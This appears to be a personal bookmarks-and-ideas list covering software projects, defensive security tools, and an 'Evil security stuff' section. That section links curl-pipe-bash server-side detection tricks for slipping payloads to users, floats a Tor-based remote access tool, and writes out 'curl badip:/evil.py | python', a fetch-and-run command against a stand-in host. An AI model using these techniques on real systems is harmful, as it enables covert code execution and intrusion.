- cool firefly algorithm
- https://github.com/cretz/bine (for tor controllers)
- https://github.com/phil-op/blog_os - a rust OS
- elasticsearch alternative: https://github.com/prabhatsharma/zinc
- JC (like JQ)
- https://addons.mozilla.org/en-US/firefox/addon/trackerless-magnets/?src=external-addonsbadge-daniel.priv.no
Good security stuff
- Falco
- Auditd
- SecurityOnion
- MISP
- TheHive
- Cillium
- path prevention analysis - lengthen opportunities to stop, rebuild faster than zero day, “prevention is nice. detection is essential’ @sechubb, @anthomsec @arekfurt
Evil security stuff
- detecting whether a user isn’t paying attention to what they’ve just downloaded:
- https://web.archive.org/web/20211116150123/https://www.idontplaydarts.com/2016/04/detecting-curl-pipe-bash-server-side/
- https://code.moparisthebest.com/moparisthebest/curl_bash/src/branch/master/src/main.rs
- https://github.com/mokytis/curlbash
- https://github.com/4iar/evil-pipe
- https://github.com/MylesJohnson/Pipe-Injector
- could also use sponge to try to thwart it but honestly then it gets into honeypot cat and mouse games (arg where’s that article…)
- detecting honeypots
- in memory filesystem (e.g.,
\tcurl badip:/evil.py | python) - could use https://github.com/cretz/bine for a simple remote access tool
- kdelfour/cloud9-ide probably has enough stale vulns by this point to be tractable
misc
- abi crashed? then use qemu-chroot of the most stable version to serve the network device